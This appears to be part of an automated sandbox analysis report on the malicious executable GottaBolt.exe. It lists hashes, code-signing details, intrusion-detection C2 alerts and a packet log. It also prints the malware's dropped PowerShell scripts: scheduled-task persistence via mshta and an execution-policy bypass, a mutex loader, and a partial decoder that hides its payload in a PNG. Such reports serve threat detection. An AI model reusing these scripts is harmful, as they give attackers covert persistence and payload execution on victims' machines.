                                                                        SHA-512:8BB2243DA2DCD7A5A99FF9EE7DE5714B64E121C2964A377473243A7E934B4B5CDF6FC03D9599BB3D6E7820EC6A721B6606013DB5A22213FBB4D342581E80DEE2
                                                                        Malicious:true
                                                                        Preview:..$FJEDtpgnLZFYGPNpoGKh = $MyInvocation.MyCommand.Name -replace ".ps1",""..$RXGdjypCMHceRhuJfPJs = $PSCommandPath -replace "1.ps1","2.ps1" ..$RXGdjypCMHceRhuJfPJs2 = $PSCommandPath -replace "1.ps1","1.txt"....try{.. $GrpiRjCgWmuoKNEyrDGl = Get-ScheduledTask | Where-Object {$_.TaskName -like $FJEDtpgnLZFYGPNpoGKh }.. $RVtpzybqKKhWBTOvebyl = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1).. $pzVIuyqOqXiucSHDQrrK = New-ScheduledTaskAction -Execute "mshta" -Argument "vbscript:Execute(""CreateObject(""""WScript.Shell"""").Run """"powershell -ep bypass -File """"""""$RXGdjypCMHceRhuJfPJs """""""""""" ,0:close"")".... Register-ScheduledTask -TaskName $FJEDtpgnLZFYGPNpoGKh -Trigger $RVtpzybqKKhWBTOvebyl -Action $pzVIuyqOqXiucSHDQrrK..}catch{}..

                                                                        C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):634
                                                                        Entropy (8bit):5.833740964026308
                                                                        Encrypted:false
                                                                        SSDEEP:12:w4Sn9CZJ2pTdLU6c/oLdHYlTCZJ60+H7ZJFCE2v03Dn9Q4hCE803Idh0pTc:w4Sn9SJcTJ3kWd4luJdyJFCtmDn9ZwI0
                                                                        MD5:512572D966775F296E94D47FDADC7084
                                                                        SHA1:711AEB8C5A05BBD9DDF5EF091377BBD134102340
                                                                        SHA-256:0624B9A4281AC22EC2D60A8D032F715179124F59467D18E35EDD874F3BE73622
                                                                        SHA-512:E77E6F147E0015A3D8725A2DD289AFA131F64B50F5659C85B4BCFF535C83B9ADDD867F778B3F8A2BD95524811FFF2F5A53584BB43DED63F34DE4EF63829A0866
                                                                        Malicious:true
                                                                        Preview:$ZDNvIjTGRqqxxsCwUwEm = $MyInvocation.MyCommand.Name -replace ".ps1",""..$LVFROpEgMhheqihlShOU = $false..$GhCaISkdVfKDaxhDTdbY = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$ZDNvIjTGRqqxxsCwUwEm", ([ref] $LVFROpEgMhheqihlShOU)..if( -not $LVFROpEgMhheqihlShOU ) {.. Exit..} else{..$baoIiBrvpvNhoZPJpfTA = $PSScriptRoot..$ZCDLGKTXHAkbsOLiiIRb = $MyInvocation.MyCommand.Name -replace "2.ps1","3.ps1"..$SKoVmyXbzHvfEFrqtFgI = $baoIiBrvpvNhoZPJpfTA + "\"+$ZCDLGKTXHAkbsOLiiIRb..$GWNHRUZBkZrTQxkENUUP = & $SKoVmyXbzHvfEFrqtFgI..$GWNHRUZBkZrTQxkENUUP.EntryPoint.Invoke($null, $null)..}

                                                                        C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc3.ps1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4280
                                                                        Entropy (8bit):5.846866372111361
                                                                        Encrypted:false
                                                                        SSDEEP:96:DQTeoYFTOscpZhNtsflOFxQd00QTD4mwdRNn/G3C31LaRQ3:8zYFTZcpZhNS4FOd0jTsmwd3kw
                                                                        MD5:9C8EF122BEE8C9E2F9FF64316A2A5667
                                                                        SHA1:E2081F2F0A84C78AEBCF9A15D56EA4EF2780583F
                                                                        SHA-256:82C32C426C63C07403D08661BE6CC0B5A322FF249008ABED8372E8717D6C0A3E
                                                                        SHA-512:2C011DDC9164AAB7CFC1893379D9AA68F3D5CAA8319BE01A8BBCEA8D7E45BE0702BF3A795C01682A22C61CFFDA3B2E4FFF28372B06AECB9F3EFFFA6EFE530E9E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc3.ps1, Author: Joe Security
                                                                        Preview:Add-Type -AssemblyName System.Drawing...Add-Type -AssemblyName System......Function TMDWufOrkrSNilgCWsFo {...[CmdletBinding()]... param(... [Parameter(Mandatory=$true)] [String]$GHF,... [Parameter(Mandatory=$true)] [String]$bts... )......$WtWUkMxaqeNUsUOyIjkO = [System.Drawing.Bitmap]::FromFile((Resolve-Path $GHF).ProviderPath)...$YCvEdhOciFBfinFHlwWA = ""...$mCwhfUrUwXdKBToGjRbx = [System.Text.StringBuilder]::new()...for ($gZTQsVUwrkHJyqlcUBcM = 0; $gZTQsVUwrkHJyqlcUBcM -le $WtWUkMxaqeNUsUOyIjkO.Height-1; $gZTQsVUwrkHJyqlcUBcM++){... for ($AiOWSlxGVmGLvICKYbXb = 0; $AiOWSlxGVmGLvICKYbXb -le $WtWUkMxaqeNUsUOyIjkO.Width-1; $AiOWSlxGVmGLvICKYbXb++){... $NskQsNNXNSUUsaHcWYbH = $WtWUkMxaqeNUsUOyIjkO.GetPixel($AiOWSlxGVmGLvICKYbXb,$gZTQsVUwrkHJyqlcUBcM)... $WNJMnmOaBNEjYUPUbBRB = [System.Drawing.ColorTranslator]::ToHtml($NskQsNNXNSUUsaHcWYbH)... $WNJMnmOaBNEjYUPUbBRB = $WNJMnmOaBNEjYUPUbBRB.replace("#000000","")... [void]$mCwhfUrUwXdKBToGjRbx.Append($WNJMnmOaBNEjYUP

                                                                        C:\Users\user\AppData\Roaming\Adobe\zfHvaMgyXTBAMdfoAHCG.txt

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PNG image data, 1473 x 1473, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):7432853
                                                                        Entropy (8bit):7.986271893099559
                                                                        Encrypted:false
                                                                        SSDEEP:196608:FPB+f1ue/rl7ZbXC/4e0nlW8uTZ6sGW6RAbF2AeWWCWyBaF:FZ+fl/FZA4e4lat6sj69OZBg
                                                                        MD5:A2CBABC89FCAA0116EF6C3A81BBF6B2E
                                                                        SHA1:91C56617B338A0489BCD5B2524D60A5C989D917E
                                                                        SHA-256:799940F29519523970F6E6761D1AC892FEC5BA95DA764BF980ABF4F471DA0B35
                                                                        SHA-512:1C3A71B5C37924926F250E871C2F41896D6212480B83C8BB6E5149A7638D3CB80918C84A292AFA84565588F7E2F8754F6623227C47F8E052971347BB36E11314
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR.............U-Wy....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w8....UJB.J..%D.hh.....ESR........H*...%...>Z".E*.H..............z...8."..Z..T.......S.o....1....D.......P.....T.....,....~.8-..R...g.3.......8m.E..2.=..!+..'.@q.]F....o.....}.Eb.......<U.I.b.!...G.c.=........{9...!....i+.So.......4Y..g5..[3..4...P.....d.q(.g..W.@.T..w....*b>..."M..2..o.B.-w?..G.<S..a>x./.|.dm_.].....n..M.p...dz...>..[.X.......|w.v.{y.h...v.,9...%\.z.E9{..\...9..~._...5..T.{..6.4I..K.cr.(..T.s.E..,...b.z...X......w.i....,..|..v....3.>.4z3.A...c.#.._....9..Ws.R"Ck..~....Z..8....M...*.bR\..V._.......Mi..^....t..Z\(..o..t..&#...^)...eL.3....:c.6{%.w...w\...Ys....a:...Z..>.....\.....l...k.....H.g.~..'.`.v."Z..j.O\s......|v.Ju}9.......4a...h7...On.n.........X75...........^..EGa.-.]K+PLs!...Q.c..B./I.~..W.p.+.S4o....S1i.I.....=......v|.^!.v8.....5e..X......K.4.=.......db..6W..j.......@.....q ..?.{b%m5...e.g.]..fJ.l..:.0.D..{UtT.........K.$.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.503980671997943
                                                                        TrID:
                                                                        • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                        • Win64 Executable GUI (202006/5) 46.43%
                                                                        • Win64 Executable (generic) (12005/4) 2.76%
                                                                        • Generic Win/DOS Executable (2004/3) 0.46%
                                                                        • DOS Executable Generic (2002/1) 0.46%
                                                                        File name:GottaBolt.exe
                                                                        File size:25'560 bytes
                                                                        MD5:981c56e26ae89a9190d1f1db9d2683ce
                                                                        SHA1:43a46c1736a4f9f5264dab79761b44e2ea0cc18c
                                                                        SHA256:79b6e63218982c1e85a5e1798c5484e7e034cfecbe9f2da604f668fda8428af4
                                                                        SHA512:444c9d6bd90ef779493b13f1b966c684ac95d8d0f3065b02a2e0853fd9cca5afaed98808acb01f6e5c8d760a432e4450165089037cc86b802bb3549ae8b55a8c
                                                                        SSDEEP:384:pVCnS83YG0Chg4thBMXIwTiiFLfVm3bIncwVJC2FpfhCm/iWD:5zFChgVWiFwkn7q2FGK/
                                                                        TLSH:36B26D52BEA8C365DA764F71D8F201120E72EEAB5871D99D28C4B0455DF37827A13A3C
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...F.W..........."...0..,............... .....@..... ...............................X....`...@......@............... .....

                                                                        File Icon

                                                                        Icon Hash:5d7d6d5c737b0b13

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x140000000
                                                                        Entrypoint Section:
                                                                        Digitally signed:true
                                                                        Imagebase:0x140000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x9557AA46 [Tue May 25 10:13:26 2049 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:

                                                                        Authenticode Signature

                                                                        Signature Valid:true
                                                                        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                        Signature Validation Error:The operation completed successfully
                                                                        Error Number:0
                                                                        Not Before, Not After
                                                                        • 11/11/2024 17:44:37 11/11/2025 11:55:28
                                                                        Subject Chain
                                                                        • OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=INDCARE AFRICA LIMITED, SERIALNUMBER=CPR/2009/10319, O=INDCARE AFRICA LIMITED, L=Nairobi, C=KE
                                                                        Version:3
                                                                        Thumbprint MD5:94B8889ECAB18DBC7A0FE22A3EFB1EC9
                                                                        Thumbprint SHA-1:643F5BE0BC3ED89ADE028AAF7AA5D50B84C50E8F
                                                                        Thumbprint SHA-256:1CB573AB94C9AFE77CAEF2718FD4ECCEAFFF3A7B0AA0BBC56B5D3C792BC58B92
                                                                        Serial:69C55475FFD7B1A2474296E14C5CF8D9

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        dec ebp
                                                                        pop edx
                                                                        nop
                                                                        add byte ptr [ebx], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x1768.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x46000x1dd8
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x49800x38.text
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x2a300x2c006b7fab5f38c02d4b87ba53c166f0c89cFalse0.5116299715909091data5.487360602684014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x60000x17680x1800e2e8d24ecac2dfbfaed968d5b69faa65False0.5139973958333334data5.51672574409712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x61000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5539399624765479
                                                                        RT_GROUP_ICON0x71b80x14data1.1
                                                                        RT_VERSION0x71dc0x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.40308370044052866
                                                                        RT_MANIFEST0x75780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-22T17:03:15.452290+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.74971277.91.73.101443TCP
                                                                        2024-11-22T17:03:17.991291+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74971477.91.73.101443TCP
                                                                        2024-11-22T17:03:17.991291+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.74971477.91.73.101443TCP
                                                                        2024-11-22T17:03:20.619296+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74972077.91.73.101443TCP
                                                                        2024-11-22T17:03:20.619296+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.74972077.91.73.101443TCP
                                                                        2024-11-22T17:03:23.142248+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74972677.91.73.101443TCP
                                                                        2024-11-22T17:03:23.142248+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.74972677.91.73.101443TCP
                                                                        2024-11-22T17:03:25.652247+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74973577.91.73.101443TCP
                                                                        2024-11-22T17:03:25.652247+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.74973577.91.73.101443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 22, 2024 17:03:13.428766012 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:13.428853989 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:13.428934097 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:13.444683075 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:13.444720984 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:14.880243063 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:14.880326033 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:14.883776903 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:14.883793116 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:14.884033918 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:14.936309099 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:14.976054907 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:15.023333073 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:15.452366114 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:15.452537060 CET4434971277.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:15.452646017 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:15.477279902 CET49712443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:16.000742912 CET49714443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:16.000786066 CET4434971477.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:16.000869036 CET49714443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:16.001171112 CET49714443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:16.001188040 CET4434971477.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:17.433739901 CET4434971477.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:17.436566114 CET49714443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:17.436600924 CET4434971477.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:17.991344929 CET4434971477.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:17.991434097 CET4434971477.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:17.991487026 CET49714443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:17.991951942 CET49714443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:18.516324043 CET49720443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:18.516422033 CET4434972077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:18.516510010 CET49720443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:18.516801119 CET49720443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:18.516834974 CET4434972077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:20.021408081 CET4434972077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:20.022794008 CET49720443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:20.022861958 CET4434972077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:20.619321108 CET4434972077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:20.619393110 CET4434972077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:20.619556904 CET49720443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:20.620202065 CET49720443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:21.124901056 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:21.124943972 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:21.125003099 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:21.125264883 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:21.125277996 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:22.585213900 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:22.587385893 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:22.587409973 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:23.142131090 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:23.142152071 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:23.142203093 CET4434972677.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:23.142219067 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:23.142251968 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:23.142889023 CET49726443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:23.667010069 CET49735443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:23.667084932 CET4434973577.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:23.667368889 CET49735443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:23.670439005 CET49735443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:23.670471907 CET4434973577.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.099752903 CET4434973577.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.100878000 CET49735443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:25.100941896 CET4434973577.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.542485952 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:25.542521000 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.542587996 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:25.545327902 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:25.545342922 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.652158976 CET4434973577.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.652215958 CET4434973577.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:25.652337074 CET49735443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:25.652713060 CET49735443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:26.952953100 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:26.953053951 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:26.998383999 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:26.998400927 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:26.998770952 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.009486914 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.055339098 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.726892948 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.726918936 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.726933956 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.727027893 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.727056980 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.727178097 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.877724886 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.877751112 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.877861977 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.877875090 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.877896070 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.878146887 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.922091007 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.922116041 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.922225952 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:27.922240019 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:27.922314882 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.044298887 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.044326067 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.044460058 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.044472933 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.044565916 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.072402000 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.072417021 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.072510004 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.072520971 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.072623968 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.096046925 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.096062899 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.096148968 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.096155882 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.096224070 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.126940966 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.126959085 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.127044916 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.127054930 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.127140999 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.232378006 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.232402086 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.232573032 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.232588053 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.232718945 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.250482082 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.250497103 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.250610113 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.250621080 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.250688076 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.271537066 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.271553040 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.271742105 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.271752119 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.271960020 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.288820982 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.288837910 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.288983107 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.288997889 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.289079905 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.306425095 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.306451082 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.306555986 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.306565046 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.306682110 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.325409889 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.325427055 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.325669050 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.325678110 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.325798035 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.412024021 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.412051916 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.412174940 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.412199020 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.412257910 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.426394939 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.426414013 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.426481962 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.426487923 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.426525116 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.426593065 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:28.439980030 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.440006018 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:28.440171003 CET49740443192.168.2.777.91.73.101
